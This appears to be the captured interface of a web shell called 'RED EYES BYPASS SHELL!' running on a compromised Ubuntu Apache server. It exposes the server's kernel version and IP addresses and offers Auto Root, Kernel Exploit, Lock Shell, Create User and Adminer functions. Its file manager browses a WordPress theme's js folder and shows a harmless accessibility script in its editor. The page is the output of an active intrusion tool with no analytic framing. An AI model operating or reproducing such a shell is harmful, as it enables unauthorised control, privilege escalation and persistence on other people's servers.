Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
themes /
twentysixteen /
js /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
color-scheme-control.js
2.88
KB
-rwxr-xr-x
customize-preview.js
1.04
KB
-rwxr-xr-x
functions.js
7.15
KB
-rwxr-xr-x
html5.js
10.09
KB
-rwxr-xr-x
keyboard-image-navigation.js
527
B
-rwxr-xr-x
skip-link-focus-fix.js
810
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : skip-link-focus-fix.js
/** * File skip-link-focus-fix.js. * * Helps with accessibility for keyboard only users. * * Learn more: https://git.io/vWdr2 */ ( function() { var isIe = /(trident|msie)/i.test( navigator.userAgent ); if ( isIe && document.getElementById && window.addEventListener ) { window.addEventListener( 'hashchange', function() { var id = location.hash.substring( 1 ), element; if ( ! ( /^[A-z0-9_-]+$/.test( id ) ) ) { return; } element = document.getElementById( id ); if ( element ) { if ( ! ( /^(?:a|select|input|button|textarea)$/i.test( element.tagName ) ) ) { element.tabIndex = -1; } element.focus(); // Repositions the window on jump-to-anchor to account for admin bar and border height. window.scrollBy( 0, -53 ); } }, false ); } } )();
Close